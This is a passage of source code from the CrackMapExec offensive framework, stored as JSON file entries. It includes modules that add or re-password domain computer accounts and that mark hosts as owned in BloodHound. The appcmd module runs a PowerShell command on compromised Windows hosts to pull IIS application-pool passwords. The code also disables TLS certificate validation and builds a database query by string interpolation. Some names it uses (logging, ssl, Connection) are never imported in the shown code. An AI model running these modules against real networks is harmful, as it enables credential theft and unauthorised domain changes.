connection.ldapConnection.search(\n searchFilter=search_filter,\n attributes=[],\n sizeLimit=0,\n searchControls=[sc],\n perRecordCallback=self.process_servers,\n searchBase=\"CN=Configuration,\" + base_dn_root,\n )\n else:\n resp = connection.ldapConnection.search(\n searchFilter=search_filter + base_dn_root + \")\",\n attributes=[\"certificateTemplates\"],\n sizeLimit=0,\n searchControls=[sc],\n perRecordCallback=self.process_templates,\n searchBase=\"CN=Configuration,\" + base_dn_root,\n )\n except LDAPSearchError as e:\n context.log.fail(\"Obtained unexpected exception: {}\".format(str(e)))\n\n def process_servers(self, item):\n \"\"\"\n Function that is called to process the items obtain by the LDAP search when listing PKI Enrollment Servers.\n \"\"\"\n if not isinstance(item, ldapasn1.SearchResultEntry):\n return\n\n urls = []\n host_name = None\n cn = None\n\n try:\n for attribute in item[\"attributes\"]:\n if str(attribute[\"type\"]) == \"dNSHostName\":\n host_name = attribute[\"vals\"][0].asOctets().decode(\"utf-8\")\n if str(attribute[\"type\"]) == \"cn\":\n cn = attribute[\"vals\"][0].asOctets().decode(\"utf-8\")\n elif str(attribute[\"type\"]) == \"msPKI-Enrollment-Servers\":\n values = attribute[\"vals\"]\n\n for value in values:\n value = value.asOctets().decode(\"utf-8\")\n match = self.regex.search(value)\n if match:\n urls.append(match.group(1))\n except Exception as e:\n entry = host_name or \"item\"\n self.context.log.fail(\"Skipping {}, cannot process LDAP entry due to error: '{}'\".format(entry, str(e)))\n\n if host_name:\n self.context.log.highlight(\"Found PKI Enrollment Server: {}\".format(host_name))\n if cn:\n self.context.log.highlight(\"Found CN: {}\".format(cn))\n for url in urls:\n self.context.log.highlight(\"Found PKI Enrollment WebService: {}\".format(url))\n\n def process_templates(self, item):\n \"\"\"\n Function that is called to process the items obtain by the LDAP search when listing Certificate Templates Names for a specific PKI Enrollment Server.\n \"\"\"\n if not isinstance(item, ldapasn1.SearchResultEntry):\n return\n\n templates = []\n template_name = None\n\n try:\n for attribute in item[\"attributes\"]:\n if str(attribute[\"type\"]) == \"certificateTemplates\":\n for val in attribute[\"vals\"]:\n template_name = val.asOctets().decode(\"utf-8\")\n templates.append(template_name)\n except Exception as e:\n entry = template_name or \"item\"\n self.context.log.fail(f\"Skipping {entry}, cannot process LDAP entry due to error: '{e}'\")\n\n if templates:\n for t in templates:\n self.context.log.highlight(\"Found Certificate Template: {}\".format(t))\n" }, { "path": "cme/modules/add_computer.py", "content": "#!/usr/bin/env python3\n\n# -*- coding: utf-8 -*-\n\nimport ldap3\nfrom impacket.dcerpc.v5 import samr, epm, transport\n\nclass CMEModule:\n '''\n Module by CyberCelt: @Cyb3rC3lt\n Initial module:\n https://github.com/Cyb3rC3lt/CrackMapExec-Modules\n Thanks to the guys at impacket for the original code\n '''\n\n name = 'add-computer'\n description = 'Adds or deletes a domain computer'\n supported_protocols = ['smb']\n opsec_safe = True\n multiple_hosts = False\n\n def options(self, context, module_options):\n '''\n add-computer: Specify add-computer to call the module using smb\n NAME: Specify the NAME option to name the Computer to be added\n PASSWORD: Specify the PASSWORD option to supply a password for the Computer to be added\n DELETE: Specify DELETE to remove a Computer\n CHANGEPW: Specify CHANGEPW to modify a Computer password\n Usage: cme smb $DC-IP -u Username -p Password -M add-computer -o NAME=\"BADPC\" PASSWORD=\"Password1\"\n cme smb $DC-IP -u Username -p Password -M add-computer -o NAME=\"BADPC\" DELETE=True\n cme smb $DC-IP -u Username -p Password -M add-computer -o NAME=\"BADPC\" PASSWORD=\"Password2\" CHANGEPW=True\n '''\n\n self.__baseDN = None\n self.__computerGroup = None\n self.__method = \"SAMR\"\n self.__noAdd = False\n self.__delete = False\n self.noLDAPRequired = False\n\n if 'DELETE' in module_options:\n self.__delete = True\n\n if 'CHANGEPW' in module_options and ('NAME' not in module_options or 'PASSWORD' not in module_options):\n context.log.error('NAME and PASSWORD options are required!')\n elif 'CHANGEPW' in module_options:\n self.__noAdd = True\n\n if 'NAME' in module_options:\n self.__computerName = module_options['NAME']\n if self.__computerName[-1] != '$':\n self.__computerName += '$'\n else:\n context.log.error('NAME option is required!')\n exit(1)\n\n if 'PASSWORD' in module_options:\n self.__computerPassword = module_options['PASSWORD']\n elif 'PASSWORD' not in module_options and not self.__delete:\n context.log.error('PASSWORD option is required!')\n exit(1)\n\n def on_login(self, context, connection):\n\n #Set some variables\n self.__domain = connection.domain\n self.__domainNetbios = connection.domain\n self.__kdcHost = connection.hostname + \".\" + connection.domain\n self.__target = self.__kdcHost\n self.__username = connection.username\n self.__password = connection.password\n self.__targetIp = connection.host\n self.__port = context.smb_server_port\n self.__aesKey = context.aesKey\n self.__hashes = context.hash\n self.__doKerberos = connection.kerberos\n self.__nthash = \"\"\n self.__lmhash = \"\"\n\n if context.hash and \":\" in context.hash[0]:\n hashList = context.hash[0].split(\":\")\n self.__nthash = hashList[-1]\n self.__lmhash = hashList[0]\n elif context.hash and \":\" not in context.hash[0]:\n self.__nthash = context.hash[0]\n self.__lmhash = \"00000000000000000000000000000000\"\n\n # First try to add via SAMR over SMB\n self.doSAMRAdd(context)\n\n # If SAMR fails now try over LDAPS\n if not self.noLDAPRequired:\n self.doLDAPSAdd(connection,context)\n else:\n exit(1)\n\n def doSAMRAdd(self,context):\n\n if self.__targetIp is not None:\n stringBinding = epm.hept_map(self.__targetIp, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_np')\n else:\n stringBinding = epm.hept_map(self.__target, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_np')\n rpctransport = transport.DCERPCTransportFactory(stringBinding)\n rpctransport.set_dport(self.__port)\n\n if self.__targetIp is not None:\n rpctransport.setRemoteHost(self.__targetIp)\n rpctransport.setRemoteName(self.__target)\n\n if hasattr(rpctransport, 'set_credentials'):\n # This method exists only for selected protocol sequences.\n rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,\n self.__nthash, self.__aesKey)\n\n rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)\n\n dce = rpctransport.get_dce_rpc()\n servHandle = None\n domainHandle = None\n userHandle = None\n try:\n dce.connect()\n dce.bind(samr.MSRPC_UUID_SAMR)\n\n samrConnectResponse = samr.hSamrConnect5(dce, '\\\\\\\\%s\\x00' % self.__target,\n samr.SAM_SERVER_ENUMERATE_DOMAINS | samr.SAM_SERVER_LOOKUP_DOMAIN )\n servHandle = samrConnectResponse['ServerHandle']\n\n samrEnumResponse = samr.hSamrEnumerateDomainsInSamServer(dce, servHandle)\n domains = samrEnumResponse['Buffer']['Buffer']\n domainsWithoutBuiltin = list(filter(lambda x : x['Name'].lower() != 'builtin', domains))\n\n if len(domainsWithoutBuiltin) > 1:\n domain = list(filter(lambda x : x['Name'].lower() == self.__domainNetbios, domains))\n if len(domain) != 1:\n context.log.highlight(u'{}'.format(\n 'This domain does not exist: \"' + self.__domainNetbios + '\"'))\n logging.critical(\"Available domain(s):\")\n for domain in domains:\n logging.error(\" * %s\" % domain['Name'])\n raise Exception()\n else:\n selectedDomain = domain[0]['Name']\n else:\n selectedDomain = domainsWithoutBuiltin[0]['Name']\n\n samrLookupDomainResponse = samr.hSamrLookupDomainInSamServer(dce, servHandle, selectedDomain)\n domainSID = samrLookupDomainResponse['DomainId']\n\n if logging.getLogger().level == logging.DEBUG:\n logging.info(\"Opening domain %s...\" % selectedDomain)\n samrOpenDomainResponse = samr.hSamrOpenDomain(dce, servHandle, samr.DOMAIN_LOOKUP | samr.DOMAIN_CREATE_USER , domainSID)\n domainHandle = samrOpenDomainResponse['DomainHandle']\n\n if self.__noAdd or self.__delete:\n try:\n checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])\n except samr.DCERPCSessionError as e:\n if e.error_code == 0xc0000073:\n context.log.highlight(u'{}'.format(\n self.__computerName + ' not found in domain ' + selectedDomain))\n self.noLDAPRequired = True\n raise Exception()\n else:\n raise\n\n userRID = checkForUser['RelativeIds']['Element'][0]\n if self.__delete:\n access = samr.DELETE\n message = \"delete\"\n else:\n access = samr.USER_FORCE_PASSWORD_CHANGE\n message = \"set the password for\"\n try:\n openUser = samr.hSamrOpenUser(dce, domainHandle, access, userRID)\n userHandle = openUser['UserHandle']\n except samr.DCERPCSessionError as e:\n if e.error_code == 0xc0000022:\n context.log.highlight(u'{}'.format(\n self.__username + ' does not have the right to ' + message + \" \" + self.__computerName))\n self.noLDAPRequired = True\n raise Exception()\n else:\n raise\n else:\n if self.__computerName is not None:\n try:\n checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])\n self.noLDAPRequired = True\n context.log.highlight(u'{}'.format(\n 'Computer account already exists with the name: \"' + self.__computerName + '\"'))\n raise Exception()\n except samr.DCERPCSessionError as e:\n if e.error_code != 0xc0000073:\n raise\n else:\n foundUnused = False\n while not foundUnused:\n self.__computerName = self.generateComputerName()\n try:\n checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])\n except samr.DCERPCSessionError as e:\n if e.error_code == 0xc0000073:\n foundUnused = True\n else:\n raise\n try:\n createUser = samr.hSamrCreateUser2InDomain(dce, domainHandle, self.__computerName, samr.USER_WORKSTATION_TRUST_ACCOUNT, samr.USER_FORCE_PASSWORD_CHANGE,)\n self.noLDAPRequired = True\n context.log.highlight('Successfully added the machine account: \"' + self.__computerName + '\" with Password: \"' + self.__computerPassword + '\"')\n except samr.DCERPCSessionError as e:\n if e.error_code == 0xc0000022:\n context.log.highlight(u'{}'.format(\n 'The following user does not have the right to create a computer account: \"' + self.__username + '\"'))\n raise Exception()\n elif e.error_code == 0xc00002e7:\n context.log.highlight(u'{}'.format(\n 'The following user exceeded their machine account quota: \"' + self.__username + '\"'))\n raise Exception()\n else:\n raise\n userHandle = createUser['UserHandle']\n\n if self.__delete:\n samr.hSamrDeleteUser(dce, userHandle)\n context.log.highlight(u'{}'.format('Successfully deleted the \"' + self.__computerName + '\" Computer account'))\n self.noLDAPRequired=True\n userHandle = None\n else:\n samr.hSamrSetPasswordInternal4New(dce, userHandle, self.__computerPassword)\n if self.__noAdd:\n context.log.highlight(u'{}'.format(\n 'Successfully set the password of machine \"' + self.__computerName + '\" with password \"' + self.__computerPassword + '\"'))\n self.noLDAPRequired=True\n else:\n checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])\n userRID = checkForUser['RelativeIds']['Element'][0]\n openUser = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, userRID)\n userHandle = openUser['UserHandle']\n req = samr.SAMPR_USER_INFO_BUFFER()\n req['tag'] = samr.USER_INFORMATION_CLASS.UserControlInformation\n req['Control']['UserAccountControl'] = samr.USER_WORKSTATION_TRUST_ACCOUNT\n samr.hSamrSetInformationUser2(dce, userHandle, req)\n if not self.noLDAPRequired:\n context.log.highlight(u'{}'.format(\n 'Successfully added the machine account \"' + self.__computerName + '\" with Password: \"' + self.__computerPassword + '\"'))\n self.noLDAPRequired = True\n\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n finally:\n if userHandle is not None:\n samr.hSamrCloseHandle(dce, userHandle)\n if domainHandle is not None:\n samr.hSamrCloseHandle(dce, domainHandle)\n if servHandle is not None:\n samr.hSamrCloseHandle(dce, servHandle)\n dce.disconnect()\n\n def doLDAPSAdd(self, connection, context):\n ldap_domain = connection.domain.replace(\".\", \",dc=\")\n spns = [\n 'HOST/%s' % self.__computerName,\n 'HOST/%s.%s' % (self.__computerName, connection.domain),\n 'RestrictedKrbHost/%s' % self.__computerName,\n 'RestrictedKrbHost/%s.%s' % (self.__computerName, connection.domain),\n ]\n ucd = {\n 'dnsHostName': '%s.%s' % (self.__computerName, connection.domain),\n 'userAccountControl': 0x1000,\n 'servicePrincipalName': spns,\n 'sAMAccountName': self.__computerName,\n 'unicodePwd': ('\"%s\"' % self.__computerPassword).encode('utf-16-le')\n }\n tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2, ciphers='ALL:@SECLEVEL=0')\n ldapServer = ldap3.Server(connection.host, use_ssl=True, port=636, get_info=ldap3.ALL, tls=tls)\n c = Connection(ldapServer, connection.username + '@' + connection.domain, connection.password)\n c.bind()\n\n if (self.__delete):\n result = c.delete(\"cn=\" + self.__computerName + \",cn=Computers,dc=\" + ldap_domain)\n if result:\n context.log.highlight(u'{}'.format('Successfully deleted the \"' + self.__computerName + '\" Computer account'))\n elif result == False and c.last_error == \"noSuchObject\":\n context.log.highlight(u'{}'.format('Computer named \"' + self.__computerName + '\" was not found'))\n elif result == False and c.last_error == \"insufficientAccessRights\":\n context.log.highlight(\n u'{}'.format('Insufficient Access Rights to delete the Computer \"' + self.__computerName + '\"'))\n else:\n context.log.highlight(u'{}'.format(\n 'Unable to delete the \"' + self.__computerName + '\" Computer account. The error was: ' + c.last_error))\n else:\n result = c.add(\"cn=\" + self.__computerName + \",cn=Computers,dc=\" + ldap_domain,\n ['top', 'person', 'organizationalPerson', 'user', 'computer'], ucd)\n if result:\n context.log.highlight('Successfully added the machine account: \"' + self.__computerName + '\" with Password: \"' + self.__computerPassword + '\"')\n context.log.highlight(u'{}'.format('You can try to verify this with the CME command:'))\n context.log.highlight(u'{}'.format(\n 'cme ldap ' + connection.host + ' -u ' + connection.username + ' -p ' + connection.password + ' -M group-mem -o GROUP=\"Domain Computers\"'))\n elif result == False and c.last_error == \"entryAlreadyExists\":\n context.log.highlight(u'{}'.format('The Computer account \"' + self.__computerName + '\" already exists'))\n elif not result:\n context.log.highlight(u'{}'.format(\n 'Unable to add the \"' + self.__computerName + '\" Computer account. The error was: ' + c.last_error))\n c.unbind()\n" }, { "path": "cme/modules/appcmd.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nclass CMEModule:\n\n \"\"\"\n Checks for credentials in IIS Application Pool configuration files using appcmd.exe.\n\n Module by Brandon Fisher @shad0wcntr0ller\n \"\"\"\n\n name = 'iis'\n description = \"Checks for credentials in IIS Application Pool configuration files using appcmd.exe\"\n supported_protocols = ['smb']\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self):\n pass\n\n def options(self, context, module_options):\n pass\n\n def on_admin_login(self, context, connection):\n self.check_appcmd(context, connection)\n\n def check_appcmd(self, context, connection):\n \n if not hasattr(connection, 'has_run'):\n connection.has_run = False\n\n \n if connection.has_run:\n return\n\n connection.has_run = True\n\n \n try:\n connection.conn.listPath('C$', '\\\\Windows\\\\System32\\\\inetsrv\\\\appcmd.exe')\n self.execute_appcmd(context, connection)\n except:\n context.log.fail(\"appcmd.exe not found, this module is not applicable.\")\n return\n\n def execute_appcmd(self, context, connection):\n command = f'powershell -c \"C:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd.exe list apppool /@t:*\"'\n context.log.info(f'Checking For Hidden Credentials With Appcmd.exe')\n output = connection.execute(command, True)\n \n lines = output.splitlines()\n username = None\n password = None\n apppool_name = None\n\n credentials_set = set()\n\n for line in lines:\n if 'APPPOOL.NAME:' in line:\n apppool_name = line.split('APPPOOL.NAME:')[1].strip().strip('\"')\n if \"userName:\" in line:\n username = line.split(\"userName:\")[1].strip().strip('\"')\n if \"password:\" in line:\n password = line.split(\"password:\")[1].strip().strip('\"')\n\n \n if apppool_name and username is not None and password is not None: \n current_credentials = (apppool_name, username, password)\n\n if current_credentials not in credentials_set:\n credentials_set.add(current_credentials)\n \n if username:\n context.log.success(f\"Credentials Found for APPPOOL: {apppool_name}\")\n if password == \"\":\n context.log.highlight(f\"Username: {username} - User Does Not Have A Password\")\n else:\n context.log.highlight(f\"Username: {username}, Password: {password}\")\n\n \n username = None\n password = None\n apppool_name = None\n\n if not credentials_set:\n context.log.fail(\"No credentials found :(\")\n" }, { "path": "cme/modules/bh_owned.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author:\n# Romain Bentz (pixis - @hackanddo)\n# Website:\n# https://beta.hackndo.com [FR]\n# https://en.hackndo.com [EN]\n\nimport sys\nfrom neo4j import GraphDatabase\nfrom neo4j.exceptions import AuthError, ServiceUnavailable\n\n\nclass CMEModule:\n name = \"bh_owned\"\n description = \"Set pwned computer as owned in Bloodhound\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n self.neo4j_pass = None\n self.neo4j_user = None\n self.neo4j_Port = None\n self.neo4j_URI = None\n\n def options(self, context, module_options):\n \"\"\"\n URI URI for Neo4j database (default: 127.0.0.1)\n PORT Listening port for Neo4j database (default: 7687)\n USER Username for Neo4j database (default: 'neo4j')\n PASS Password for Neo4j database (default: 'neo4j')\n \"\"\"\n\n self.neo4j_URI = \"127.0.0.1\"\n self.neo4j_Port = \"7687\"\n self.neo4j_user = \"neo4j\"\n self.neo4j_pass = \"neo4j\"\n\n if module_options and \"URI\" in module_options:\n self.neo4j_URI = module_options[\"URI\"]\n if module_options and \"PORT\" in module_options:\n self.neo4j_Port = module_options[\"PORT\"]\n if module_options and \"USER\" in module_options:\n self.neo4j_user = module_options[\"USER\"]\n if module_options and \"PASS\" in module_options:\n self.neo4j_pass = module_options[\"PASS\"]\n\n def on_admin_login(self, context, connection):\n if context.local_auth:\n domain = connection.conn.getServerDNSDomainName()\n else:\n domain = connection.domain\n\n host_fqdn = f\"{connection.hostname}.{domain}\".upper()\n uri = f\"bolt://{self.neo4j_URI}:{self.neo4j_Port}\"\n context.log.debug(f\"Neo4j URI: {uri}\")\n context.log.debug(f\"User: {self.neo4j_user}, Password: {self.neo4j_pass}\")\n\n try:\n driver = GraphDatabase.driver(uri, auth=(self.neo4j_user, self.neo4j_pass), encrypted=False)\n except AuthError:\n context.log.fail(f\"Provided Neo4J credentials ({self.neo4j_user}:{self.neo4j_pass}) are\" \" not valid. See --options\")\n sys.exit()\n except ServiceUnavailable:\n context.log.fail(f\"Neo4J does not seem to be available on {uri}. See --options\")\n sys.exit()\n except Exception as e:\n context.log.fail(\"Unexpected error with Neo4J\")\n context.log.debug(f\"Error {e}: \")\n sys.exit()\n\n with driver.session() as session:\n with session.begin_transaction() as tx:\n result = tx.run(f'MATCH (c:Computer {{name:\"{host_fqdn}\"}}) SET c.owned=True RETURN' \" c.name AS name\")\n record = result.single()\n try:\n value = record.value()\n except AttributeError:\n value = []\n if len(value) > 0:\n context.log.success(f\"Node {host_fqdn} successfully set as owned in BloodHound\")\n else:\n context.log.fail(f\"Node {host_fqdn} does not appear to be in Neo4J database. Have you\" \" imported the correct data?\")\n driver.close()\n" }, { "path": "cme/modules/daclread.py", "content": "import binascii\nimport codecs\nimport json\nimport re\nimport datetime\nfrom enum import Enum\nfrom impacket.ldap import ldaptypes\nfrom impacket.uuid import bin_to_string\nfrom cme.helpers.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS\nfrom ldap3.protocol.formatters.formatters import format_sid\nfrom ldap3.utils.conv import escape_filter_chars\nfrom ldap3.protocol.microsoft import security_descriptor_control\n\nOBJECT_TYPES_GUID = {}\nOBJECT_TYPES_GUID.update(SCHEMA_OBJECTS)\nOBJECT_TYPES_GUID.update(EXTENDED_RIGHTS)\n\n# Universal SIDs\nWELL_KNOWN_SIDS = {\n \"S-1-0\": \"Null Authority\",\n \"S-1-0-0\": \"Nobody\",\n \"S-1-1\": \"World Authority\",\n \"S-1-1-0\": \"Everyone\",\n \"S-1-2\": \"Local Authority\",\n \"S-1-2-0\": \"Local\",\n \"S-1-2-1\": \"Console Logon\",\n \"S-1-3\": \"Creator Authority\",\n \"S-1-3-0\": \"Creator Owner\",\n \"S-1-3-1\": \"Creator Group\",\n \"S-1-3-2\": \"Creator Owner Server\",\n \"S-1-3-3\": \"Creator Group Server\",\n \"S-1-3-4\": \"Owner Rights\",\n \"S-1-5-80-0\": \"All Services\",\n \"S-1-4\": \"Non-unique Authority\",\n \"S-1-5\": \"NT Authority\",\n \"S-1-5-1\": \"Dialup\",\n \"S-1-5-2\": \"Network\",\n \"S-1-5-3\": \"Batch\",\n \"S-1-5-4\": \"Interactive\",\n \"S-1-5-6\": \"Service\",\n \"S-1-5-7\": \"Anonymous\",\n \"S-1-5-8\": \"Proxy\",\n \"S-1-5-9\": \"Enterprise Domain Controllers\",\n \"S-1-5-10\": \"Principal Self\",\n \"S-1-5-11\": \"Authenticated Users\",\n \"S-1-5-12\": \"Restricted Code\",\n \"S-1-5-13\": \"Terminal Server Users\",\n \"S-1-5-14\": \"Remote Interactive Logon\",\n \"S-1-5-15\": \"This Organization\",\n \"S-1-5-17\": \"This Organization\",\n \"S-1-5-18\": \"Local System\",\n \"S-1-5-19\": \"NT Authority\",\n \"S-1-5-20\": \"NT Authority\",\n \"S-1-5-32-544\": \"Administrators\",\n \"S-1-5-32-545\": \"Users\",\n \"S-1-5-32-546\": \"Guests\",\n \"S-1-5-32-547\": \"Power Users\",\n \"S-1-5-32-548\": \"Account Operators\",\n \"S-1-5-32-549\": \"Server Operators\",\n \"S-1-5-32-550\": \"Print Operators\",\n \"S-1-5-32-551\": \"Backup Operators\",\n \"S-1-5-32-552\": \"Replicators\",\n \"S-1-5-64-10\": \"NTLM Authentication\",\n \"S-1-5-64-14\": \"SChannel Authentication\",\n \"S-1-5-64-21\": \"Digest Authority\",\n \"S-1-5-80\": \"NT Service\",\n \"S-1-5-83-0\": \"NT VIRTUAL MACHINE\\Virtual Machines\",\n \"S-1-16-0\": \"Untrusted Mandatory Level\",\n \"S-1-16-4096\": \"Low Mandatory Level\",\n \"S-1-16-8192\": \"Medium Mandatory Level\",\n \"S-1-16-8448\": \"Medium Plus Mandatory Level\",\n \"S-1-16-12288\": \"High Mandatory Level\",\n \"S-1-16-16384\": \"System Mandatory Level\",\n \"S-1-16-20480\": \"Protected Process Mandatory Level\",\n \"S-1-16-28672\": \"Secure Process Mandatory Level\",\n \"S-1-5-32-554\": \"BUILTIN\\Pre-Windows 2000 Compatible Access\",\n \"S-1-5-32-555\": \"BUILTIN\\Remote Desktop Users\",\n \"S-1-5-32-557\": \"BUILTIN\\Incoming Forest Trust Builders\",\n \"S-1-5-32-556\": \"BUILTIN\\\\Network Configuration Operators\",\n \"S-1-5-32-558\": \"BUILTIN\\Performance Monitor Users\",\n \"S-1-5-32-559\": \"BUILTIN\\Performance Log Users\",\n \"S-1-5-32-560\": \"BUILTIN\\Windows Authorization Access Group\",\n \"S-1-5-32-561\": \"BUILTIN\\Terminal Server License Servers\",\n \"S-1-5-32-562\": \"BUILTIN\\Distributed COM Users\",\n \"S-1-5-32-569\": \"BUILTIN\\Cryptographic Operators\",\n \"S-1-5-32-573\": \"BUILTIN\\Event Log Readers\",\n \"S-1-5-32-574\": \"BUILTIN\\Certificate Service DCOM Access\",\n \"S-1-5-32-575\": \"BUILTIN\\RDS Remote Access Servers\",\n \"S-1-5-32-576\": \"BUILTIN\\RDS Endpoint Servers\",\n \"S-1-5-32-577\": \"BUILTIN\\RDS Management Servers\",\n \"S-1-5-32-578\": \"BUILTIN\\Hyper-V Administrators\",\n \"S-1-5-32-579\": \"BUILTIN\\Access Control Assistance Operators\",\n \"S-1-5-32-580\": \"BUILTIN\\Remote Management Users\",\n}\n\n\n# GUID rights enum\n# GUID thats permits to identify extended rights in an ACE\n# https://docs.microsoft.com/en-us/windows/win32/adschema/a-rightsguid\nclass RIGHTS_GUID(Enum):\n WriteMembers = \"bf9679c0-0de6-11d0-a285-00aa003049e2\"\n ResetPassword = \"00299570-246d-11d0-a768-00aa006e0529\"\n DS_Replication_Get_Changes = \"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2\"\n DS_Replication_Get_Changes_All = \"1131f6ad-9c07-11d1-f79f-00c04fc2dcd2\"\n\n\n# ACE flags enum\n# New ACE at the end of SACL for inheritance and access return system-audit\n# https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-addauditaccessobjectace\nclass ACE_FLAGS(Enum):\n CONTAINER_INHERIT_ACE = ldaptypes.ACE.CONTAINER_INHERIT_ACE\n FAILED_ACCESS_ACE_FLAG = ldaptypes.ACE.FAILED_ACCESS_ACE_FLAG\n INHERIT_ONLY_ACE = ldaptypes.ACE.INHERIT_ONLY_ACE\n INHERITED_ACE = ldaptypes.ACE.INHERITED_ACE\n NO_PROPAGATE_INHERIT_ACE = ldaptypes.ACE.NO_PROPAGATE_INHERIT_ACE\n OBJECT_INHERIT_ACE = ldaptypes.ACE.OBJECT_INHERIT_ACE\n SUCCESSFUL_ACCESS_ACE_FLAG = ldaptypes.ACE.SUCCESSFUL_ACCESS_ACE_FLAG\n\n\n# ACE flags enum\n# For an ACE, flags that indicate if the ObjectType and the InheritedObjecType are set with a GUID\n# Since these two flags are the same for Allowed and Denied access, the same class will be used from 'ldaptypes'\n# https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-access_allowed_object_ace\nclass OBJECT_ACE_FLAGS(Enum):\n ACE_OBJECT_TYPE_PRESENT = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT\n ACE_INHERITED_OBJECT_TYPE_PRESENT = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_INHERITED_OBJECT_TYPE_PRESENT\n\n\n# Access Mask enum\n# Access mask permits to encode principal's rights to an object. This is the rights the principal behind the specified SID has\n# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/7a53f60e-e730-4dfe-bbe9-b21b62eb790b\n# https://docs.microsoft.com/en-us/windows/win32/api/iads/ne-iads-ads_rights_enum?redirectedfrom=MSDN\nclass ACCESS_MASK(Enum):\n # Generic Rights\n GenericRead = 0x80000000 # ADS_RIGHT_GENERIC_READ\n GenericWrite = 0x40000000 # ADS_RIGHT_GENERIC_WRITE\n GenericExecute = 0x20000000 # ADS_RIGHT_GENERIC_EXECUTE\n GenericAll = 0x10000000 # ADS_RIGHT_GENERIC_ALL\n\n # Maximum Allowed access type\n MaximumAllowed = 0x02000000\n\n # Access System Acl access type\n AccessSystemSecurity = 0x01000000 # ADS_RIGHT_ACCESS_SYSTEM_SECURITY\n\n # Standard access types\n Synchronize = 0x00100000 # ADS_RIGHT_SYNCHRONIZE\n WriteOwner = 0x00080000 # ADS_RIGHT_WRITE_OWNER\n WriteDACL = 0x00040000 # ADS_RIGHT_WRITE_DAC\n ReadControl = 0x00020000 # ADS_RIGHT_READ_CONTROL\n Delete = 0x00010000 # ADS_RIGHT_DELETE\n\n # Specific rights\n AllExtendedRights = 0x00000100 # ADS_RIGHT_DS_CONTROL_ACCESS\n ListObject = 0x00000080 # ADS_RIGHT_DS_LIST_OBJECT\n DeleteTree = 0x00000040 # ADS_RIGHT_DS_DELETE_TREE\n WriteProperties = 0x00000020 # ADS_RIGHT_DS_WRITE_PROP\n ReadProperties = 0x00000010 # ADS_RIGHT_DS_READ_PROP\n Self = 0x00000008 # ADS_RIGHT_DS_SELF\n ListChildObjects = 0x00000004 # ADS_RIGHT_ACTRL_DS_LIST\n DeleteChild = 0x00000002 # ADS_RIGHT_DS_DELETE_CHILD\n CreateChild = 0x00000001 # ADS_RIGHT_DS_CREATE_CHILD\n\n\n# Simple permissions enum\n# Simple permissions are combinaisons of extended permissions\n# https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc783530(v=ws.10)?redirectedfrom=MSDN\nclass SIMPLE_PERMISSIONS(Enum):\n FullControl = 0xF01FF\n Modify = 0x0301BF\n ReadAndExecute = 0x0200A9\n ReadAndWrite = 0x02019F\n Read = 0x20094\n Write = 0x200BC\n\n\n# Mask ObjectType field enum\n# Possible values for the Mask field in object-specific ACE (permitting to specify extended rights in the ObjectType field for example)\n# Since these flags are the same for Allowed and Denied access, the same class will be used from 'ldaptypes'\n# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/c79a383c-2b3f-4655-abe7-dcbb7ce0cfbe\nclass ALLOWED_OBJECT_ACE_MASK_FLAGS(Enum):\n ControlAccess = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS\n CreateChild = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CREATE_CHILD\n DeleteChild = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_DELETE_CHILD\n ReadProperty = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_READ_PROP\n WriteProperty = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP\n Self = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_SELF\n\n\nclass CMEModule:\n \"\"\"\n Module to read and backup the Discretionary Access Control List of one or multiple objects.\n This module is essentially inspired from the dacledit.py script of Impacket that we have coauthored, @_nwodtuhs and me.\n It has been converted to an LDAPConnection session, and improvements on the filtering and the ability to specify multiple targets have been added.\n It could be interesting to implement the write/remove functions here, but a ldap3 session instead of a LDAPConnection one is required to write.\n \"\"\"\n\n name = \"daclread\"\n description = \"Read and backup the Discretionary Access Control List of objects. Based on the work of @_nwodtuhs and @BlWasp_. Be carefull, this module cannot read the DACLS recursively, more explains in the options.\"\n supported_protocols = [\"ldap\"]\n opsec_safe = True\n multiple_hosts = False\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n\n def options(self, context, module_options):\n \"\"\"\n Be carefull, this module cannot read the DACLS recursively. For example, if an object has particular rights because it belongs to a group, the module will not be able to see it directly, you have to check the group rights manually.\n TARGET The objects that we want to read or backup the DACLs, sepcified by its SamAccountName\n TARGET_DN The object that we want to read or backup the DACL, specified by its DN (usefull to target the domain itself)\n PRINCIPAL The trustee that we want to filter on\n ACTION The action 